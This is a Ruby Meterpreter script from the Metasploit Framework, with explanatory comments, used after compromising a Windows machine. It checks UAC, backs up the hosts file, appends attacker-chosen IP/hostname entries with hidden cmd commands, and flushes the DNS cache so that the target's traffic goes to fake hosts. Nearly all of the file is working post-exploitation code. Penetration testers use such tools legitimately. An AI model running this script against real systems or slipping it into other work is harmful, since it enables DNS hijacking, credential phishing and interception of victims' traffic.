metasploit-framework/scripts/meterpreter/hostsedit.rb


# $Id$
# Meterpreter script for modifying the hosts file on Windows,
# given a single entry or several entries in a file, and for clearing the
# DNS cache on the target machine.
# This script works with Windows 2000, Windows XP, Windows 2003,
# Windows Vista and Windows 2008.
# Provided: carlos_perez[at]darkoperator[dot]com
# Version: 0.1.0
# Note: on Vista, UAC must be disabled to be able to perform hosts
# file modifications.
################## Variable Declarations ##################
# The Meterpreter session this script acts on.
session = client
# Option table: flag => [takes_argument, description].
option_spec = {
  "-h" => [ false, "Help Options." ],
  "-e" => [ true, "Host entry in the format of IP,Hostname." ],
  "-l" => [ true, "Text file with list of entries in the format of IP,Hostname. One per line." ]
}
# Kept as a class variable because usage() below reads @@exec_opts.
@@exec_opts = Rex::Parser::Arguments.new(option_spec)
# Prints the help text, the option summary from @@exec_opts and two usage
# examples, then ends the script by raising Rex::Script::Completed.
#
# @raise [Rex::Script::Completed] always, after printing the help
def usage
  description = [
    "This Meterpreter script is for adding entries in to the Windows Hosts file.",
    "Since Windows will check first the Hosts file instead of the configured DNS Server",
    "it will assist in diverting traffic to the fake entry or entries. Either a single",
    "entry can be provided or a series of entries provided a file with one per line."
  ]
  description.each { |line| print_line(line) }
  print_line(@@exec_opts.usage)
  examples = [
    "Example:\n\n",
    "run hostsedit -e 127.0.0.1,google.com\n",
    "run hostsedit -l /tmp/fakednsentries.txt\n\n"
  ]
  examples.each { |line| print_line(line) }
  raise Rex::Script::Completed
end
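# Full path of the hosts file on the target, resolved from the target's
# %SYSTEMROOT%. (The former unused `record` local was removed; add2hosts
# receives its record as a parameter.)
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"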
#Function check if UAC is enabled
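# Aborts the script when UAC is enabled on a Windows Vista target.
#
# Only targets whose sysinfo "OS" string matches /Windows Vista/ are
# inspected; on any other OS string the method returns without touching
# the registry. On Vista it reads the EnableLUA value under
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and
# raises when it is 1, because the script cannot modify the hosts file
# with UAC on. The registry handle is closed whether or not the query
# succeeds (the original leaked it), and the unused `status` local is gone.
#
# @param session [Object] the Meterpreter client session
# @raise [RuntimeError] when UAC is enabled on a Vista target
# @return [nil]
def checkuac(session)
  winver = session.sys.config.sysinfo
  return unless winver["OS"] =~ /Windows Vista/

  print_status("Checking if UAC is enabled.")
  open_key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", KEY_READ)
  begin
    value = open_key.query_value("EnableLUA").data
  ensure
    # Release the remote registry handle even if query_value raises.
    open_key.close
  end

  if value == 1
    print_status("\tUAC is enabled")
    raise "Unable to continue UAC is enabled."
  end
  print_status("\tUAC is disabled")
  nil
end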
#Function for adding record to hosts file
# Appends one "IP<TAB>hostname" line to the target's hosts file by running
# `cmd /c echo ... >> hosts` hidden on the target.
#
# Only the first two comma-separated fields of the record are used; extra
# fields are ignored, and a record with no comma yields an empty hostname.
#
# @param session [Object] the Meterpreter client session
# @param record [String] an entry in the form "IP,Hostname"
# @param hosts [String] full path of the hosts file on the target
def add2hosts(session,record,hosts)
  fields = record.split(",")
  ip = fields[0]
  host = fields[1]
  print_status("Adding Record for Host #{host} with IP #{ip}")
  append_cmd = "cmd /c echo #{ip}\t#{host} >> #{hosts}"
  session.sys.process.execute(append_cmd, nil, {'Hidden' => true})
end
#Make a backup of the hosts file on the target
# Copies the target's hosts file to a backup next to it, named
# "<hosts><5 random digits>.back" (for example "hosts12345.back"). The
# backup is left on the target and is not removed by this script.
#
# @param session [Object] the Meterpreter client session
# @param hosts [String] full path of the hosts file on the target
def backuphosts(session,hosts)
  suffix = sprintf("%.5d",rand(100000))
  backup_path = "#{hosts}#{suffix}.back"
  print_status("Making Backup of the hosts file.")
  copy_cmd = "cmd /c copy #{hosts} #{backup_path}"
  session.sys.process.execute(copy_cmd, nil, {'Hidden' => true})
  print_status("Backup loacated in #{backup_path}")
end
# Clear DNS Cached entries
# Flushes the target's DNS resolver cache with `ipconfig /flushdns`
# (run hidden via cmd) so the new hosts entries take effect immediately.
#
# @param session [Object] the Meterpreter client session
def cleardnscach(session)
  print_status("Clearing the DNS Cache")
  flush_cmd = "cmd /c ipconfig /flushdns"
  session.sys.process.execute(flush_cmd, nil, {'Hidden' => true})
end
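# Option dispatch. Both modifying options check UAC first, back up the
# hosts file, write the entries and then flush the DNS cache.
# Changes from the original: File.exists? (removed in Ruby 3.2) is now
# File.exist?, and the entry list is opened in block form so the handle is
# closed after reading instead of leaking.
@@exec_opts.parse(args) { |opt, _idx, val|
  case opt
  when "-e"
    checkuac(session)
    backuphosts(session,hosts)
    add2hosts(session,val,hosts)
    cleardnscach(session)
  when "-l"
    checkuac(session)
    # The entry list is a local file on the operator's side, not on the target.
    raise "File #{val} does not exists!" unless ::File.exist?(val)

    backuphosts(session,hosts)
    ::File.open(val, "r") do |list|
      list.each_line { |line| add2hosts(session,line.chomp,hosts) }
    end
    cleardnscach(session)
  when "-h"
    usage
  end
}
# No options at all: print help (usage raises Rex::Script::Completed).
usage if args.empty?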